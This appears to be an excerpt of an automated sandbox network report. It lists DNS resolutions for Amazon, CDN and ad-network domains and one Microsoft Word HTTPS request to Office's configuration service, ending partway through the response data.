                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:45.639770031 CEST1.1.1.1192.168.2.40x1489No error (0)images-na.ssl-images-amazon.comm.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:45.639770031 CEST1.1.1.1192.168.2.40x1489No error (0)m.media-amazon.comtp.c47710ee9-frontier.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:45.639770031 CEST1.1.1.1192.168.2.40x1489No error (0)tp.c47710ee9-frontier.media-amazon.comc.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:45.639770031 CEST1.1.1.1192.168.2.40x1489No error (0)c.media-amazon.com108.156.69.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:45.640500069 CEST1.1.1.1192.168.2.40x829cNo error (0)images-na.ssl-images-amazon.comm.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:45.640500069 CEST1.1.1.1192.168.2.40x829cNo error (0)m.media-amazon.comtp.c47710ee9-frontier.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:45.640500069 CEST1.1.1.1192.168.2.40x829cNo error (0)tp.c47710ee9-frontier.media-amazon.comf.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:45.640500069 CEST1.1.1.1192.168.2.40x829cNo error (0)f.media-amazon.commedia.amazon.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:45.698872089 CEST1.1.1.1192.168.2.40x62d5No error (0)d2h8zr0m6mus4x.cloudfront.net18.239.15.221A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:45.698872089 CEST1.1.1.1192.168.2.40x62d5No error (0)d2h8zr0m6mus4x.cloudfront.net18.239.15.159A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:45.698872089 CEST1.1.1.1192.168.2.40x62d5No error (0)d2h8zr0m6mus4x.cloudfront.net18.239.15.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:45.698872089 CEST1.1.1.1192.168.2.40x62d5No error (0)d2h8zr0m6mus4x.cloudfront.net18.239.15.201A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:46.793384075 CEST1.1.1.1192.168.2.40xff15No error (0)images-na.ssl-images-amazon.comm.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:46.793384075 CEST1.1.1.1192.168.2.40xff15No error (0)m.media-amazon.comtp.c47710ee9-frontier.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:46.793384075 CEST1.1.1.1192.168.2.40xff15No error (0)tp.c47710ee9-frontier.media-amazon.comf.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:46.793384075 CEST1.1.1.1192.168.2.40xff15No error (0)f.media-amazon.commedia.amazon.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:46.793384075 CEST1.1.1.1192.168.2.40xff15No error (0)media.amazon.map.fastly.net151.101.129.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:46.793384075 CEST1.1.1.1192.168.2.40xff15No error (0)media.amazon.map.fastly.net151.101.1.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:46.793384075 CEST1.1.1.1192.168.2.40xff15No error (0)media.amazon.map.fastly.net151.101.193.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:46.793384075 CEST1.1.1.1192.168.2.40xff15No error (0)media.amazon.map.fastly.net151.101.65.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:46.793504000 CEST1.1.1.1192.168.2.40xd201No error (0)images-na.ssl-images-amazon.comm.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:46.793504000 CEST1.1.1.1192.168.2.40xd201No error (0)m.media-amazon.comtp.c47710ee9-frontier.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:46.793504000 CEST1.1.1.1192.168.2.40xd201No error (0)tp.c47710ee9-frontier.media-amazon.coma.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:46.793504000 CEST1.1.1.1192.168.2.40xd201No error (0)a.media-amazon.coma.media-amazon.com.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:50.582683086 CEST1.1.1.1192.168.2.40xa7bdNo error (0)completion.amazon.aecompletion.amazon.co.ukCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:50.582683086 CEST1.1.1.1192.168.2.40xa7bdNo error (0)completion.amazon.co.uk3.253.166.191A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:50.591445923 CEST1.1.1.1192.168.2.40x525No error (0)completion.amazon.aecompletion.amazon.co.ukCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:51.207772970 CEST1.1.1.1192.168.2.40x124Name error (3)amazon.partners.tremorhub.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:51.209064960 CEST1.1.1.1192.168.2.40x77d4Name error (3)amazon.partners.tremorhub.comnonenone65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:51.220846891 CEST1.1.1.1192.168.2.40x5cb0Name error (3)amazon.partners.tremorhub.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:52.954138041 CEST1.1.1.1192.168.2.40x1f3cNo error (0)unagi.amazon.aeunagi-eu.amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:52.954138041 CEST1.1.1.1192.168.2.40x1f3cNo error (0)unagi-eu.amazon.com52.94.218.5A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:52.955785990 CEST1.1.1.1192.168.2.40x296dNo error (0)unagi.amazon.aeunagi-eu.amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:53.372807980 CEST1.1.1.1192.168.2.40xc2e3Name error (3)amazon.partners.tremorhub.comnonenone65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:53.373229027 CEST1.1.1.1192.168.2.40x21b3Name error (3)amazon.partners.tremorhub.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:54.865888119 CEST1.1.1.1192.168.2.40xa8bfNo error (0)unagi.amazon.aeunagi-eu.amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:54.865888119 CEST1.1.1.1192.168.2.40xa8bfNo error (0)unagi-eu.amazon.com67.220.228.97A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:54.866590023 CEST1.1.1.1192.168.2.40x459dNo error (0)unagi.amazon.aeunagi-eu.amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:55.668431997 CEST1.1.1.1192.168.2.40x8edbNo error (0)a8265b8647714b88e2cd01354cc7d3d6b.profile.iah50-c1.cloudfront.net13.249.29.123A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:55.668431997 CEST1.1.1.1192.168.2.40x8edbNo error (0)a8265b8647714b88e2cd01354cc7d3d6b.profile.iah50-c1.cloudfront.net13.249.29.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:55.668431997 CEST1.1.1.1192.168.2.40x8edbNo error (0)a8265b8647714b88e2cd01354cc7d3d6b.profile.iah50-c1.cloudfront.net13.249.29.191A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:55.668431997 CEST1.1.1.1192.168.2.40x8edbNo error (0)a8265b8647714b88e2cd01354cc7d3d6b.profile.iah50-c1.cloudfront.net13.249.29.167A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:58.039998055 CEST1.1.1.1192.168.2.40xae4eNo error (0)a8265b8647714b88e2cd01354cc7d3d6b.profile.iah50-c1.cloudfront.net13.249.29.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:58.039998055 CEST1.1.1.1192.168.2.40xae4eNo error (0)a8265b8647714b88e2cd01354cc7d3d6b.profile.iah50-c1.cloudfront.net13.249.29.167A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:58.039998055 CEST1.1.1.1192.168.2.40xae4eNo error (0)a8265b8647714b88e2cd01354cc7d3d6b.profile.iah50-c1.cloudfront.net13.249.29.123A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:58.039998055 CEST1.1.1.1192.168.2.40xae4eNo error (0)a8265b8647714b88e2cd01354cc7d3d6b.profile.iah50-c1.cloudfront.net13.249.29.191A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:25:20.811471939 CEST1.1.1.1192.168.2.40xec90No error (0)aax-eu.amazon-adsystem.com67.220.226.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:25:22.967801094 CEST1.1.1.1192.168.2.40x5afdNo error (0)ads.stickyadstv.comip1.ads.stickyadstv.com.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:25:22.967816114 CEST1.1.1.1192.168.2.40x41ffNo error (0)ads.stickyadstv.comip1.ads.stickyadstv.com.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:25:22.976450920 CEST1.1.1.1192.168.2.40x515eNo error (0)loadus.exelator.comloadus.tm.ssl.exelator.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:25:22.976450920 CEST1.1.1.1192.168.2.40x515eNo error (0)loadus.tm.ssl.exelator.comeu-west.load.exelator.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:25:22.976450920 CEST1.1.1.1192.168.2.40x515eNo error (0)eu-west.load.exelator.comload-euw1.exelator.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:25:22.980706930 CEST1.1.1.1192.168.2.40x8cfNo error (0)loadus.exelator.comloadus.tm.ssl.exelator.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:25:22.980706930 CEST1.1.1.1192.168.2.40x8cfNo error (0)loadus.tm.ssl.exelator.comeu-west.load.exelator.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:25:22.980706930 CEST1.1.1.1192.168.2.40x8cfNo error (0)eu-west.load.exelator.comload-euw1.exelator.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:25:22.980706930 CEST1.1.1.1192.168.2.40x8cfNo error (0)load-euw1.exelator.com54.78.254.47A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:25:22.980719090 CEST1.1.1.1192.168.2.40x5540No error (0)usersync.gumgum.com34.247.205.196A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:25:22.980719090 CEST1.1.1.1192.168.2.40x5540No error (0)usersync.gumgum.com34.247.233.198A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:25:22.980719090 CEST1.1.1.1192.168.2.40x5540No error (0)usersync.gumgum.com52.210.15.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:25:22.980781078 CEST1.1.1.1192.168.2.40x1356No error (0)capi.connatix.comcapi.connatix.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:25:22.980791092 CEST1.1.1.1192.168.2.40x4246No error (0)capi.connatix.comcapi.connatix.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:25:22.985558987 CEST1.1.1.1192.168.2.40xc504Name error (3)amazon.partners.tremorhub.comnonenone65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:25:22.987147093 CEST1.1.1.1192.168.2.40x5ee0Name error (3)amazon.partners.tremorhub.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:25:22.998205900 CEST1.1.1.1192.168.2.40x7cf7Name error (3)amazon.partners.tremorhub.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:25:23.157838106 CEST1.1.1.1192.168.2.40xd7b6No error (0)s.amazon-adsystem.com52.46.143.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:25:23.793044090 CEST1.1.1.1192.168.2.40x9c3eNo error (0)s.amazon-adsystem.com209.54.182.161A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:25:24.572798014 CEST1.1.1.1192.168.2.40x9570No error (0)aax-eu.amazon-adsystem.com52.94.223.167A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:25:26.150202990 CEST1.1.1.1192.168.2.40x93a1No error (0)www.amazon.aetp.c9a5976c7-frontier.amazon.aeCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:25:26.150202990 CEST1.1.1.1192.168.2.40x93a1No error (0)tp.c9a5976c7-frontier.amazon.aedlsq0ztllwnya.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:25:26.150202990 CEST1.1.1.1192.168.2.40x93a1No error (0)dlsq0ztllwnya.cloudfront.net52.222.236.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:25:26.150202990 CEST1.1.1.1192.168.2.40x93a1No error (0)dlsq0ztllwnya.cloudfront.net52.222.236.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:25:26.150202990 CEST1.1.1.1192.168.2.40x93a1No error (0)dlsq0ztllwnya.cloudfront.net52.222.236.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:25:26.150202990 CEST1.1.1.1192.168.2.40x93a1No error (0)dlsq0ztllwnya.cloudfront.net52.222.236.115A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:25:26.154526949 CEST1.1.1.1192.168.2.40xcc1fNo error (0)www.amazon.aetp.c9a5976c7-frontier.amazon.aeCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:25:26.154526949 CEST1.1.1.1192.168.2.40xcc1fNo error (0)tp.c9a5976c7-frontier.amazon.aedlsq0ztllwnya.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:25:37.302479982 CEST1.1.1.1192.168.2.40x2b33No error (0)fls-eu.amazon.aefls-eu.amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:25:37.302479982 CEST1.1.1.1192.168.2.40x2b33No error (0)fls-eu.amazon.comgateway.prod.eu-west-1.forester.a2z.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:25:37.302479982 CEST1.1.1.1192.168.2.40x2b33No error (0)gateway.prod.eu-west-1.forester.a2z.comendpoint.prod.eu-west-1.forester.a2z.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:25:37.302479982 CEST1.1.1.1192.168.2.40x2b33No error (0)endpoint.prod.eu-west-1.forester.a2z.com108.128.42.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:25:37.302479982 CEST1.1.1.1192.168.2.40x2b33No error (0)endpoint.prod.eu-west-1.forester.a2z.com54.154.24.207A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:25:37.302479982 CEST1.1.1.1192.168.2.40x2b33No error (0)endpoint.prod.eu-west-1.forester.a2z.com99.80.93.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:25:37.302479982 CEST1.1.1.1192.168.2.40x2b33No error (0)endpoint.prod.eu-west-1.forester.a2z.com54.246.114.211A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:25:37.302479982 CEST1.1.1.1192.168.2.40x2b33No error (0)endpoint.prod.eu-west-1.forester.a2z.com52.213.190.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:25:37.302479982 CEST1.1.1.1192.168.2.40x2b33No error (0)endpoint.prod.eu-west-1.forester.a2z.com54.171.150.253A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:25:37.302479982 CEST1.1.1.1192.168.2.40x2b33No error (0)endpoint.prod.eu-west-1.forester.a2z.com54.72.124.168A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:25:37.302479982 CEST1.1.1.1192.168.2.40x2b33No error (0)endpoint.prod.eu-west-1.forester.a2z.com52.214.71.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:25:37.335886002 CEST1.1.1.1192.168.2.40xf5b7No error (0)fls-eu.amazon.aefls-eu.amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:25:37.335886002 CEST1.1.1.1192.168.2.40xf5b7No error (0)fls-eu.amazon.comgateway.prod.eu-west-1.forester.a2z.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:25:37.335886002 CEST1.1.1.1192.168.2.40xf5b7No error (0)gateway.prod.eu-west-1.forester.a2z.comendpoint.prod.eu-west-1.forester.a2z.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:25:48.256299973 CEST1.1.1.1192.168.2.40x6e27No error (0)www.amazon.aetp.c9a5976c7-frontier.amazon.aeCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:25:48.256299973 CEST1.1.1.1192.168.2.40x6e27No error (0)tp.c9a5976c7-frontier.amazon.aedlsq0ztllwnya.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:25:48.256299973 CEST1.1.1.1192.168.2.40x6e27No error (0)dlsq0ztllwnya.cloudfront.net18.239.36.71A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:25:48.256299973 CEST1.1.1.1192.168.2.40x6e27No error (0)dlsq0ztllwnya.cloudfront.net18.239.36.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:25:48.256299973 CEST1.1.1.1192.168.2.40x6e27No error (0)dlsq0ztllwnya.cloudfront.net18.239.36.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:25:48.256299973 CEST1.1.1.1192.168.2.40x6e27No error (0)dlsq0ztllwnya.cloudfront.net18.239.36.123A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:25:48.256388903 CEST1.1.1.1192.168.2.40xa0f9No error (0)www.amazon.aetp.c9a5976c7-frontier.amazon.aeCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:25:48.256388903 CEST1.1.1.1192.168.2.40xa0f9No error (0)tp.c9a5976c7-frontier.amazon.aedlsq0ztllwnya.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:25:54.005556107 CEST1.1.1.1192.168.2.40xfce2No error (0)unagi.amazon.aeunagi-eu.amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:25:54.006541014 CEST1.1.1.1192.168.2.40x6f12No error (0)unagi.amazon.aeunagi-eu.amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:25:54.006541014 CEST1.1.1.1192.168.2.40x6f12No error (0)unagi-eu.amazon.com67.220.226.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:26:00.003721952 CEST1.1.1.1192.168.2.40xe304No error (0)fls-eu.amazon.comgateway.prod.eu-west-1.forester.a2z.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:26:00.003721952 CEST1.1.1.1192.168.2.40xe304No error (0)gateway.prod.eu-west-1.forester.a2z.comendpoint.prod.eu-west-1.forester.a2z.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:26:00.003721952 CEST1.1.1.1192.168.2.40xe304No error (0)endpoint.prod.eu-west-1.forester.a2z.com54.154.136.52A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:26:00.003721952 CEST1.1.1.1192.168.2.40xe304No error (0)endpoint.prod.eu-west-1.forester.a2z.com54.77.214.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:26:00.003721952 CEST1.1.1.1192.168.2.40xe304No error (0)endpoint.prod.eu-west-1.forester.a2z.com3.248.64.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:26:00.003721952 CEST1.1.1.1192.168.2.40xe304No error (0)endpoint.prod.eu-west-1.forester.a2z.com52.215.131.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:26:00.003721952 CEST1.1.1.1192.168.2.40xe304No error (0)endpoint.prod.eu-west-1.forester.a2z.com54.229.217.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:26:00.003721952 CEST1.1.1.1192.168.2.40xe304No error (0)endpoint.prod.eu-west-1.forester.a2z.com52.17.175.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:26:00.003721952 CEST1.1.1.1192.168.2.40xe304No error (0)endpoint.prod.eu-west-1.forester.a2z.com54.77.88.162A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:26:00.003721952 CEST1.1.1.1192.168.2.40xe304No error (0)endpoint.prod.eu-west-1.forester.a2z.com52.208.148.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:26:00.005419016 CEST1.1.1.1192.168.2.40xc964No error (0)fls-eu.amazon.comgateway.prod.eu-west-1.forester.a2z.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:26:00.005419016 CEST1.1.1.1192.168.2.40xc964No error (0)gateway.prod.eu-west-1.forester.a2z.comendpoint.prod.eu-west-1.forester.a2z.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:26:06.262964010 CEST1.1.1.1192.168.2.40x72abNo error (0)www.google.com216.58.206.36A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:26:06.263648987 CEST1.1.1.1192.168.2.40xfedaNo error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                0192.168.2.44973852.123.243.834437048C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:22:39 UTC807OUTGET /config/v2/Office/word/16.0.16827.20130/Production/CC?&EcsCanary=1&Clientid=%7b7423E565-A626-48D4-A186-93E31FBB3F25%7d&Application=word&Platform=win32&Version=16.0.16827.20130&MsoVersion=16.0.16827.20130&ProcessName=winword.exe&Audience=Production&Build=ship&Architecture=x86&Language=en-US&SubscriptionLicense=false&PerpetualLicense=2019&LicenseCategory=7&LicenseSKU=ProPlus2019Retail&OsVersion=10.0&OsBuild=19045&Channel=CC&InstallType=C2R&SessionId=%7bE525282F-F148-49F6-8DDB-A7A3A7208FEF%7d&LabMachine=false HTTP/1.1
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                If-None-Match: ""
                                                                                                                                                                                                                                                                User-Agent: Microsoft Office 2014
                                                                                                                                                                                                                                                                DisableExperiments: false
                                                                                                                                                                                                                                                                X-ECS-Client-Last-Telemetry-Events: ecs_client_library_name=MSO,ecs_client_app_name=Office,ecs_client_version=16.0.16827.20130
                                                                                                                                                                                                                                                                Host: ecs.office.com
                                                                                                                                                                                                                                                                2024-08-12 13:22:40 UTC1181INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Cache-Control: no-cache,max-age=14400
                                                                                                                                                                                                                                                                Content-Length: 148505
                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                Expires: Mon, 12 Aug 2024 17:22:40 GMT
                                                                                                                                                                                                                                                                ETag: "gADLirDsZ0runM/4RtRvsYLPFIXBCHSbMQxq1H6tpaw="
                                                                                                                                                                                                                                                                Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                request-id: d8531b22-de1c-e03d-017c-40ff352ffa97
                                                                                                                                                                                                                                                                X-BackEndHttpStatus: 200
                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                Report-To: {"group":"NelEcsUpload1","max_age":604800,"endpoints":[{"url":"https://ecs.nel.measure.office.net?TenantId=Office&DestinationEndpoint=MIRA-SIP-FR2&FrontEnd=MIRA"}],"include_subdomains":true}
                                                                                                                                                                                                                                                                NEL: {"report_to":"NelEcsUpload1","max_age":604800,"include_subdomains":true,"failure_fraction":1.0,"success_fraction":0.01}
                                                                                                                                                                                                                                                                X-Proxy-RoutingCorrectness: 1
                                                                                                                                                                                                                                                                X-MSEdge-Ref: MIRA: d8531b22-de1c-e03d-017c-40ff352ffa97 FR2P281CA0060 2024-08-12T13:22:40.071Z
                                                                                                                                                                                                                                                                Alt-Svc: h3=":443";ma=2592000,h3-29=":443";ma=2592000
                                                                                                                                                                                                                                                                X-Proxy-BackendServerStatus: 200
                                                                                                                                                                                                                                                                X-FirstHopCafeEFZ: FRA
                                                                                                                                                                                                                                                                X-FEProxyInfo: FR2P281CA0060.DEUP281.PROD.OUTLOOK.COM
                                                                                                                                                                                                                                                                X-FEEFZInfo: FRA
                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                X-FEServer: FR2P281CA0060
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:22:39 GMT
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                2024-08-12 13:22:40 UTC3354INData Raw: 7b 22 45 43 53 22 3a 7b 22 43 6f 6e 66 69 67 4c 6f 67 54 61 72 67 65 74 22 3a 22 64 65 66 61 75 6c 74 22 2c 22 63 37 32 65 61 32 38 37 2d 65 64 37 37 2d 34 66 61 36 2d 61 34 38 30 2d 33 37 31 32 34 30 36 63 33 36 37 65 22 3a 22 61 6b 61 2e 6d 73 2f 45 63 73 43 61 6e 61 72 79 22 2c 22 43 61 63 68 65 45 78 70 69 72 79 49 6e 4d 69 6e 22 3a 32 34 30 2c 22 45 6e 61 62 6c 65 53 6d 61 72 74 45 54 61 67 22 3a 31 2c 22 43 6f 6e 66 69 67 49 64 44 65 6c 69 6d 69 74 65 72 49 6e 4c 6f 67 22 3a 22 3b 22 7d 2c 22 4e 61 6e 63 79 4f 66 66 69 63 65 54 65 61 6d 22 3a 7b 22 7a 68 65 74 61 6e 34 31 32 32 30 32 31 22 3a 74 72 75 65 7d 2c 22 4f 66 66 69 63 65 5f 41 63 63 65 73 73 22 3a 7b 22 55 73 65 46 6f 72 6d 54 68 65 6d 65 49 66 4e 6f 50 61 72 65 6e 74 53 65 63 74 69 6f 6e
                                                                                                                                                                                                                                                                Data Ascii: {"ECS":{"ConfigLogTarget":"default","c72ea287-ed77-4fa6-a480-3712406c367e":"aka.ms/EcsCanary","CacheExpiryInMin":240,"EnableSmartETag":1,"ConfigIdDelimiterInLog":";"},"NancyOfficeTeam":{"zhetan4122021":true},"Office_Access":{"UseFormThemeIfNoParentSection
